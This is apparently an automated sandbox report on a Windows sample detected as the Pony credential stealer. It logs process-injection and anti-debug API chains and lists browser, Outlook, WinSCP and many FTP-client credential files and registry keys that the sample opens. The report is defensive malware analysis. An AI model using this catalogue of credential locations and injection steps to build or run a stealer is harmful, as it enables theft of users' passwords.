Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: a5gvJhukP7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.3.a5gvJhukP7.exe.bab604.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.bab604.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00BA433B

Source: a5gvJhukP7.exe

Static PE information: real checksum: 0xf6c6 should be: 0x3001d

Source: a5gvJhukP7.exe

Static PE information: section name: .zdata

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA3775 push ecx; ret		0_2_00BA3788
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA3775 push ecx; ret		1_2_00BA3788

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree,

0_2_00BA1300

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_1-13961

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00405024
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00404CB4
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_0040891F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00403FE7
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_0040966C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_0040879B

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_0040443E

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

API call chain: ExitProcess graph end node

graph_0-3620

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00BA229A

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA1E10 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,RtlCreateQueryDebugBuffer,GetCurrentProcessId,RtlQueryProcessDebugInformation,OutputDebugStringA,Sleep,RtlDestroyQueryDebugBuffer,

0_2_00BA1E10

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

0_2_00BA433B

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA1000 mov eax, dword ptr fs:[00000030h]	0_2_00BA1000
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_0040F731 mov eax, dword ptr fs:[00000030h]	1_2_0040F731
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA1000 mov eax, dword ptr fs:[00000030h]	1_2_00BA1000

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BA229A
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 0_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BA3DEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_004102E0 SetUnhandledExceptionFilter,RevertToSelf,	1_2_004102E0
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00BA3DEB
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	Code function: 1_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00BA229A

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

0_2_00BA1300

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Memory written: C:\Users\user\Desktop\a5gvJhukP7.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_00410042 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,

1_2_00410042

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Process created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"

Jump to behavior

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_00404313 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00404313

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_0040443E

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA391F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00BA391F

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 1_2_0041022F OleInitialize,GetUserNameA,

1_2_0041022F

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Code function: 0_2_00BA1C70 GetVersionExA,

0_2_00BA1C70

Stealing of Sensitive Information

Yara detected Pony

Source: Yara match	File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\a5gvJhukP7.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\SiteDesigner\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
